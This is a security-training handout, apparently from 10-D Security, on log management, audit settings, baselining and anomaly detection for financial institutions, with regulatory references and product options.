establishing baselines, and identifying operational trends and long-term
problems
• Establish baselines for anomaly detection
• Regulatory compliance and guidance –
– Gramm-Leach-Bliley Act
– FFIEC Information Security IT Booklet, II.C.22, III.C
– Sarbanes-Oxley Act (SOX) of 2002.14
– Payment Card Industry Data Security Standard (PCI DSS)
– NY Dept. of Financial Services, 23 NYCRR Part 500
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management
From the FFIEC:

Network and host activities typically are recorded on the host and sent across
the network to a central logging repository… Management should have
effective log retention policies that address the significance of maintaining
logs for incident response and analysis needs.
Log files are critical to the successful investigation and prosecution of security
incidents and can potentially contain sensitive information. Intruders often
attempt to conceal unauthorized access by editing or deleting log files.
Therefore, institutions should strictly control and monitor access to log files
whether on the host or in a centralized logging repository.
(IT Examination Handbook –
Information Security [III.C], September 2016)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Log Management – Possible Inputs

Assets • Antivirus
• Firewalls
Server • IDS/IPS
• VPN access
Router
• Network devices (routers, switches)
• Network Access Control systems
• SAN and NAS devices
Workstation • Proxy/web content filters (Websense,
Forcepoint, Blue Coat, etc.)
• Active Directory and other
Firewall IDS IPS
authentications servers
• Web servers (IIS or Apache)
User Info, Database,
Core, Helpdesk • Email servers
• File servers
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Log Management – Possible Inputs

Assets • Important applications
• Accounting software
Server • Core banking application
• Internet banking
• ACH/Wires
Router • Databases
• Virtual host servers
• Physical security systems
•
Workstation
Environmental
• Call Center / Help Desk
Firewall IDS IPS • Threat Intelligence
• Other (ATMs, DVRs, VoIP, etc.)
Core, Helpdesk
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Gathering Log Management – What to Log

Assets • Log management must start with having
a detailed network inventory. YOU
Log Server
Server MUST KNOW YOUR ENVIRONMENT.
• In a perfect world, collect logs from

Log File
Router
everything. In most small to mid-sized
environments, start with the critical
Workstation
Log File
systems such as firewalls and servers.
Then, move on to endpoints (desktops
and laptops) and applications.
Firewall IDS IPS Log File

Core, Helpdesk
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Gathering Log Management Considerations

Assets
• Retention and Archival
Server
Log Server
• Storage Constraints (log volume)
Log File
• Network Constraints
• Protecting the “CIA” of logs
Router
Log File
• Disparate Systems (incompatibility)
Workstation
• Ensuring log data is regularly reviewed
Firewall IDS IPS

• Forensic investigator expectations
Log File

Core, Helpdesk
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Gathering More from the FFIEC:

“Regardless of the method of log
Log Server
management, management should develop
processes to collect, aggregate, analyze, and
Log File
correlate security information. Policies
should define retention periods for security
and operational logs. Institutions maintain
Log File
event logs to understand an incident or cyber
event after it occurs. Monitoring event logs
for anomalies and relating that information
Log File
with other sources of information broadens
the institution's ability to understand trends,
react to threats, and improve reports to
management and the board.”
[IT Examination Handbook –
Information Security, Sept. 2016]
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Gathering Establish Policies and Procedures

• Obtain Management buy-in
Log Server
• Define Policy for retention period of
Log File
security and operational logs – sufficient
for investigations
• Develop Procedures for performing log
Log File
management, including requirements for:
• Log generation
• Transmission
Log File
• Storage and Retention
• Analysis
• Disposal
• Define and assign roles and
responsibilities
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The Elephant in the (server) Room
Log Retention and Storage

• Keep the original logs on the device they originate from, and a centralized
copy pushed to an aggregation server
• Implement access restrictions to ensure integrity
• Best practice is to keep your logs for at least a year, with the goal to keep
them “indefinitely” (Note: If in NY - a minimum 3yr retention required)
• Most breaches are discovered six or more months after initial compromise
• Storage costs have dropped dramatically
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Storage Costs

The cost of disk storage has dropped drastically over the last 10 years, and
hard drive sizes have grown steadily. It’s currently about 2¢ / GB.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Compression
Logs are typically text, and text compresses very well. The below example
shows log compression from over 3 GB to 127MB, an ~97% compression ratio.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management Solutions
Design Considerations
• Centralized log storage
• Volume of log data to be processed
• Network bandwidth
• Online and offline data storage
• Security requirements for the data
• Time and resources needed for staff to analyze the logs
• PLAN FOR GROWTH
• In-house vs. outsourced
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________


Commercial Solutions
• Some examples:
– SolarWinds Log & Event Manager (LEM) - install available for Windows
– ManageEngine EventLog Analyzer - install available for Linux or Windows
– Splunk - install available for Linux or Windows
– AlienVault - available as a physical or virtual appliance
– Netwrix – available for Windows, VMware and cloud-based
• Out of the box, can ingest many log types/sources
• Typically offers robust alerting, analysis, retention mgmt., and security
• Typically expensive, $4000 and up (way up), plus annual maintenance
• Annual maintenance fees - but with maintenance, comes full support
• Typically user friendly
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________


Open Source Solutions
• Some examples:
– Logstash – install available for Linux or Windows.
– Nagios – install available for Linux, or as a virtual appliance
– Graylog – install available for Windows, Linux or as a virtual appliance
– LOGalyze - install available for Linux or Windows.
• Out of the box, can ingest many log types/sources
• Typically offers robust alerting, analysis, retention management, and
security
• While the products themselves are free, some open source products offer
paid support - pricing $2000 - $15,000 and up, annually
• May be complicated, but these are getting more user friendly and
arguably on par with some commercial product features
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________


Syslog Solutions
• Some examples:
– Kiwi Syslog - install available for Windows
– Paessler PRTG - install available for Windows
– SnmpSoft Syslog Watcher - install available for Windows
– Linux - can be implemented with a Linux server using built-in tools (advanced
users only)
• Logs are pushed to a server
• Limited to receiving messages in the syslog format (usually)
• Primarily found in networking equipment, but not in Windows systems
• Lacks basic security controls that would preserve the “CIA” of logs
– Security is available: RFC 3195 defines secure log delivery (tcp, TLS, etc.)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Syslog Solutions
• Some examples:
– Kiwi Syslog - install available for Windows
– Paessler PRTG - install available for Windows
– SnmpSoft Syslog Watcher - install available for Windows
– Linux - can be implemented with a Linux server using built-in tools
(advanced users only)
• Typically limited analysis and correlation; depends on the syslog server
software
• Typical can be implemented quickly and cheaply (not many “features” to
configure); commercial products are $200-$400
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Outsourced Solutions
• Some examples:
– Dell SecureWorks
– Gladiator (ProfitStars division of JHA)
– Alert Logic
• Vendor will typically place log collector in your environment and configure
some internal systems to send logs to it
• You typically have little control over or access to this solution, and have to
rely on the vendor’s alerting and reporting
• Typically expensive, “Call for quote!”
• CHECKBOX SOLUTION, but may make sense if you have limited in-house
technical expertise
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Configuring Log Sources

• Configuring your syslog sources:
– Add the IP address of your syslog server and enable logging. There may be
granularity settings for log verbosity, but the default is typically the best place
to start.
• Configuring your Windows environment:
– Your log management solution may expect logs pushed to it, or it may be able
to pull logs from Windows systems. Consult the vendor’s guidance for
configuration.
– Windows environments allow for basic, as well as granular, logging. Typically,
smaller environments will stick to basic settings; however, by default Windows
doesn’t log everything considered important for forensics. Fortunately, it’s
easy to configure logging on all domain joined systems via Active Directory
Group Policy.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Audit Settings in Active Directory
For Log Management of Windows systems you must configure Active

Directory “audit settings” to enable logging of various events
(see “Audit Policy Settings.pdf” in course reference docs).
Audit account logon events Success, Failure

Audit account management Success, Failure
Audit logon events Success, Failure
Audit policy change Success, Failure
Audit system events Success, Failure
Audit directory service access Success, Failure
Audit object access Failure
Audit privilege use Failure
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management
Review, Correlation and Alerting

• Manual analysis:
– Necessary for troubleshooting, incident response and other search
needs
• Automated analysis:
– Correlation – finding relationships in log entries from multiple sources
– Alerting & notifications
• Necessary to handle volume of log data
• Systems parse info as ingested, generating alerts when events are detected
• Basic systems require manual creation of event detection
• Noise management and fatigue
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management
Resources
• https://technet.microsoft.com/en-us/sysinternals/sysmon
• http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf
• https://www.sans.org/reading-room/whitepapers/auditing/successful-siem-log-
management-strategies-audit-compliance-33528
• https://support.solarwinds.com/?title=Success_Center/Log_%26_Event_Manager_
(LEM)/Audit_Policies_and_Best_Practices_for_LEM
• https://technet.microsoft.com/en-us/library/dn487457.aspx
• https://www.ultimatewindowssecurity.com/wiki/WindowsSecuritySettings/OVERV
IEW-Audit-Directory-Service-Access?Keywords=Audit+directory+service+access
• https://10dsecurity.com/cyber-security-baselines-anomaly-detection/
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 4: Baselining and Anomaly Detection

Topics:
• Establishing “Normal”
• Identifying Abnormal
• Investigation
• Other Inputs to Consider
• Declaring an Incident
“Privacy may actually be an anomaly.”

- Vint Cerf
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

What is Anomaly Detection?
Anomalies are events that are unusual, or somehow out of the

ordinary. Nearly all financial institutions already have one or
more instances of anomaly detection in place. Such as:
• Debit card fraud monitoring
• Internet banking – “velocity limits,” bill pay monitoring, etc.
• Check fraud detection
Though these are financial application or transaction oriented,

the theory and operation are similar to a network anomaly
detection process.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Detection – Financial Transactions

Baseline Variables Analysis Anomalies
Customer Name • Accessing online banking from an

Customer Address unusual location or at an unusual
time of day.
Account Number
Fraud Detection • Using online banking features not
Account Type typically used.
(Anomalies)
Transaction Type • Using online banking features in an
Transaction Amt. unexpected sequence.
Transaction Freq. • Changing personal information.
• Adding payees.
• Adding approvers or changing
approval limits.
• Types and amounts of transactions.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Detection – Financial Transactions

Is the user accessing online banking as expected?
– When
– Where
– How
Are user’s banking actions considered expected?
– Frequency
– Sequence
– Time
Are transactions expected?
– Transaction Type
– Amount
– Payee
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Detection – Physical Access

Baseline Variables Analysis Anomalies
Restricted Area • Restricted area accessed by

Unrestricted Area unauthorized staff.
Day and Time • Restricted area accessed by
Access Attempt authorized staff during off-hours.
Staff Detection • Changes to access approvals.
Managers (Anomalies) • Restricted area accessed by
Vendors unknown/unapproved vendors.
Visitors • Approving access to unknown
Frequency vendors.
• Change in access frequency by staff,
ID Badge
managers, vendors, or visitors.
• Abnormal or missing ID badge.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Gathering Analysis – Where to Begin

• Establish a “Baseline”
•
Log Server
Determine what to analyze*
• Identify what anomalies might look like
•
Log File
Plan the response to an anomaly
• Implement anomaly detection
• Monitor
Log File
• Detect
• Refine the Process
Log File
* - Reference the IT Risk Assessment
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Gathering Analysis – Baselining

Determine “normal behavior” using key
Log Server
attributes that can be monitored. The
attributes must be able to provide accurate
Log File
indicators that everything is functioning as
designed and/or expected.
Log File A baseline can be established for any

number of systems or processes across the
organization.
Log File
Note: Baselines are NOT static, and will
change. Defining a reasonable period of
time before the baseline must be re-
established depends on the environment
(e.g. frequency of changes, addition of new
systems/products, staff, complexity, etc.).
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Gathering Analysis – Resources

• Network Diagrams
•
Log Server
Data Flow Diagrams
• Firewall rules/ACLs/configurations
•
Log File
User Account Permissions (Active Directory)
• Server usage ranges (performance metrics)
• Network usage ranges (performance
Log File
metrics)
• Configuration documents
Log File
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Gathering Analysis
Assets
No
Log Server
Server
Investigate if there
No is a Material
Log File Impact
Router
Activity Seen before?
Log File Yes

Workstation
Yes
Activate
Firewall IDS IPS Log File Incident Response

Core, Helpdesk
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
Normal “Data Flow” is User

Workstation → App Server
→ Core.
Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
An anomaly “Data Flow”

would be a User Workstation
directly to the Core.
Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
Another anomaly might be

any communications from
the App Server directly to
the Internet. Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
Or a Fileserver or any User

Workstation attempting an
FTP session directly to the
Internet. Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Fedline
Internet
Another anomaly might be

an unauthorized User
Workstation attempting to
access Fedline. Core
Fileserver
Application
Server
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Examples
• Log file cleared
• “Never seen before” event types, internal IPs, users, etc.
• PowerShell running on a workstation
• Large deviations (1000%+ usually) up or down on metrics
• Unauthorized user attempts to log into a server/DB/app
• Authorized user logon at an unusual time
• Unauthorized user attempts to access restricted data
• Multiple failed logins from same account, multiple systems
• Web server accessed from different IP
• Multiple database requests occurring at unusual times
• Watch for IPv6 usage
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Examples - continued

• Admin access to DB/server/etc. from a user workstation
• Database server suddenly has a lot of outbound traffic
• Degraded network/server performance
• Observed protocols in use (be aware that malware can use encrypted
comms or communicate over a port without using the actual protocol
standard)
• Sudden uptick in firewall hits from another country
• Source IPs with high number of unique destination accessed (aka scan or
sweep)
• One of your workstations is trying to connect to many other hosts (quickly)
• File server is unusually busy in the middle of the night when it is normally
idle (not backups)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Exercise
Given what we have discussed to this point, and thinking about

the hacking demos:
• List any anomalies that might have occurred and may have
been detected if there had been monitoring in place.
• Where would you expect to find the anomaly information
(e.g., firewall log, IPS, workstation event log, etc.)?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management – Back to the Demo

Remember when Scott (victim) received an email with a rogue link to run:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________


The log entry for when the suspect program was executed:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry for when the suspect program made initial contact to C&C:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry for when the suspect program connected to C&C:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry for PFRYE logging into DC from Workstation204 (192.168.68.55):
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry for PFRYE logon to DC from Workstation204 (192.168.68.55):

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry for scheduled task creation:

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The log entry details for scheduled task creation:

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Anomaly Detection
Inventory and gather all available system logs and determine
which ones are useful for monitoring baselines. For our
examples those might include:
• Active Directory - user activity
• Network usage reports
• Server performance reports
• IDS/IPS Firewall activity reports
• Antivirus reports
• Change Control logs
• User provisioning documentation
• Help Desk tickets
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Other Anomaly Sources
Gather or otherwise be aware of “unstructured information”

(e.g. voice communications, emails, user complaints, customer
complaints etc.).
Caution: Try not to initially prejudge or discount any information, as it may
be useful at some later point.
TIP: Make a checklist of key logs, reports, and information to review on a

regular basis. Also look for correlations between anomalies, and don’t be
afraid to ask questions. All of this may be useful information for re-
establishing baselines and/or filtering out false positives.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

SIEM Systems
Log management, event detection and correlation are typically

accomplished through the use of a Security Information and
Event Management (SIEM) solution. These solutions have many
benefits including log and event aggregation and correlation
across multiple systems and near real-time reporting. Most have
user-friendly and customizable formats (i.e., dashboard reports).
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

SIEM Systems
Few, if any, SIEM systems are “set and forget” solutions. Some
areas to be aware before you implement a SIEM:
• Setup is often an involved and time-consuming process, though basic
functionality can usually be implemented easily.
• On-going review and tuning must occur to reduce false-positives.
• Baseline data changes over time, and monitoring “rules” will need to be
revised to adapt to the new norms.
• Cost to implement can vary widely. From open source to enterprise-
grade, costs can range from nearly free to $20,000 or more.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
